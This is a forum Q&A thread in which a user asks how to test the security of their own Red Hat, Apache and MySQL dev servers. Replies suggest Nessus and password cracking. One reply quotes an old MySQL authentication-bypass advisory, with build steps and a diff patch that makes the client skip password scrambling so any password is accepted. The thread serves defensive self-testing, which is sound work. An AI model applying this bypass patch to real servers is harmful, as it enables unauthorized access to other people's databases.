Link to home
Start Free TrialLog in
Avatar of chigs20
chigs20

asked on

How to hack my server

To all,

I would like to try to hack our dev servers (they are a replication of our producution servers).  We have implemented several new layers of security including a Cisco Pix 501 firewall and IPTables.  But I am hoping somebody can shed some light on how I would go about trying to hack my own server to ensure they are secure.  We already do port scaning to ensure there aren't any extra open ports that aren't being used.  Are there applications that I can use for password hacking? etc.  Thanks for the help in advance.

Specs: (Three tier architecture)
RH 9.0
Apache 2.0.40
MySQL 4.0.2
Jrun4 w/ CFMX
ASKER CERTIFIED SOLUTION
Avatar of Chireru
Chireru

Link to home
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
Start Free Trial
Avatar of owensleftfoot
owensleftfoot

Give nessus a go. http://www.nessus.org/
The version of MySQL is vulnerble to a NULL password:

Vulnerable Systems:
 * MySQL version 4.1 up to but not including 4.1.3
 * MySQL version 5.0

Immune Systems:
 * MySQL version 4.1.3

The diff patch can only be used against the latest alpha version (5.0.0) of MySQL. In order to use it, follow the following steps:

 * Download and unpack the MySQL 5.0.0-alpha source
 * Patch the sql-common/client.c file:
    sql-common/ $ patch client.c mysql.authentication.bypass_client.c.diff
 * Configure and Make as usual

The resultant MySQL client binary can then be used normally but with one exception: The user can completely disregard the password and in fact can enter any password and it would not matter. The provided diff patch:
1941,1956c1941,1942
<   if (passwd[0])
<   {
<     if (mysql->server_capabilities & CLIENT_SECURE_CONNECTION)
<     {
<       *end++= SCRAMBLE_LENGTH;
<       scramble(end, mysql->scramble, passwd);
<       end+= SCRAMBLE_LENGTH;
<     }
<     else
<     {
<       scramble_323(end, mysql->scramble, passwd);
<       end+= SCRAMBLE_LENGTH_323 + 1;
<     }
<   }
<   else
<     *end++= '\0';                               /* empty password */
---
>   sprintf(end,"\x14\x00");
>   end+=2;


also to check your security use a password crack on your own system see if it can crack them
just tell us your ip ;)
SOLUTION
Link to home
membership
This solution is only available to members.
To access this solution, you must be a member of Experts Exchange.
Start Free Trial